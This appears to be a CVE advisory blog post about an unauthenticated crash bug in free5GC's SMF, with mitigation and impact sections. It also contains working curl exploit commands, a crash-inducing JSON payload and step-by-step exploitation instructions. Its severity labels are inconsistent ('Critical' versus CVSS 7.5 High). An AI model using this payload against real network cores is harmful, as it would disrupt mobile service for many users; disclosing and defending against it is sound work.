free5GC, Unauthenticated Remote DoS (Critical), CVE-2026-44321 -DC-May2026-6

Listen to this Post

CVE-2026-44321 is a critical vulnerability discovered in free5GC, an open-source 5G core network implementation. The flaw resides in the Session Management Function (SMF) component, specifically within the User Plane Infrastructure (UPI) management route group. Prior to version 4.2.2, the SMF exposes the `/upi/v1/upNodesLinks` endpoint for creating or updating User Plane Function (UPF) nodes without any inbound OAuth2 authentication or authorization middleware. This means any network attacker who can reach the SMF on its Service-Based Interface (SBI) can send HTTP requests to this administrative endpoint without any token.
The core of the vulnerability lies in how this unauthenticated request is processed. The `POST /upi/v1/upNodesLinks` handler accepts attacker-controlled JSON data and passes it directly into the `UpNodesFromConfiguration()` function. Within this function, several validation checks are performed on the configuration data. One critical check involves verifying that the IP address pools for different UPFs do not overlap.
When an attacker sends a JSON payload that defines a new UPF with a UE IP pool that overlaps with an existing, legitimate UPF’s pool, the `isOverlap()` function triggers a validation failure. Due to a severe flaw in the error-handling mechanism, the validation failure does not result in a graceful error return or a goroutine panic. Instead, it calls logger.InitLog.Fatalf(...), which is equivalent to `os.Exit(1)` and immediately terminates the entire SMF process. This is in contrast to other, less severe panics that the Gin web framework can recover from. The result is a full denial of service: the container running the SMF exits with status code 1 (Exited (1)), halting all core network services that depend on it, such as PDU session establishment and UE policy lookups, until the process is manually or automatically restarted.

DailyCVE Form:

Platform: free5GC SMF
Version: < 4.2.2
Vulnerability: Unauthenticated DoS
Severity: Critical
Date: 2026-05-27

Prediction: 2026-06-10

What Undercode Say:

Reconnaissance: Check if SMF endpoint is accessible
curl -I http://<SMF-IP>:8000/upi/v1/upNodesLinks
Exploit Attempt: Send malicious payload with overlapping UE pool
curl -i -X POST http://<SMF-IP>:8000/upi/v1/upNodesLinks \
-H 'Content-Type: application/json' \
--data '{
"links": [{"A": "gNB1", "B": "UPF-MALICIOUS"}],
"upNodes": {
"UPF-MALICIOUS": {
"type": "UPF",
"nodeID": "198.51.100.20",
"addr": "198.51.100.20",
"ueipPool": ["10.60.0.0/16"]
}
}
}'
Verification: Check if SMF container has crashed
docker ps -a --filter name=smf --format 'table {{.Names}}\t{{.Status}}'

Exploit:

This vulnerability can be exploited remotely by any attacker with network access to the SMF’s SBI interface. No authentication credentials are required.
1. Identify Target: The attacker first identifies an accessible free5GC SMF instance, typically on port 8000.
2. Craft Payload: The attacker crafts a JSON payload for a `POST` request to the `/upi/v1/upNodesLinks` endpoint. This payload defines a new UPF node (UPF-MALICIOUS).
3. Trigger Overlap: The crucial part is defining the `ueipPool` attribute for the new UPF. The attacker sets this pool to an IP range (e.g., 10.60.0.0/16) that is already in use by an existing UPF on the target network.
4. Send Request: The attacker sends the unauthenticated `POST` request to the vulnerable endpoint.
5. Denial of Service: The SMF receives the request. The `UpNodesFromConfiguration()` function validates the payload and detects the IP pool overlap. This causes a fatal error via logger.InitLog.Fatalf(), which immediately terminates the entire SMF process, leading to a complete service disruption.

Protection:

Immediate Upgrade: The primary and most effective mitigation is to upgrade the free5GC deployment to version 4.2.2 or later, which includes a fix that enforces OAuth2 authentication on all UPI routes.
Network Segmentation: As a temporary workaround, ensure the SMF’s SBI network is strictly isolated and inaccessible from any untrusted networks. Use firewalls or access control lists (ACLs) to restrict access to port 8000 to only trusted components.
Monitoring: Implement monitoring for any unexpected `POST` requests to the `/upi/v1/upNodesLinks` endpoint and for crashes of the SMF container (e.g., `Exited (1)` status).

Impact:

Complete Denial of Service: A single, small network packet can crash the core SMF process, halting 5G network functions for all connected users. Affected services include PDU session establishment, UE policy lookups, and mobility management.
High Attack Availability: The attack requires no authentication, no user interaction, and is automated, making it a highly effective tool for a remote attacker.
Operational Disruption: Recovery requires manual intervention to restart the SMF container or process, leading to significant downtime for the 5G core network.
CVSS Score 7.5 (High): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H, reflecting the network attack vector, low attack complexity, and high availability impact.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top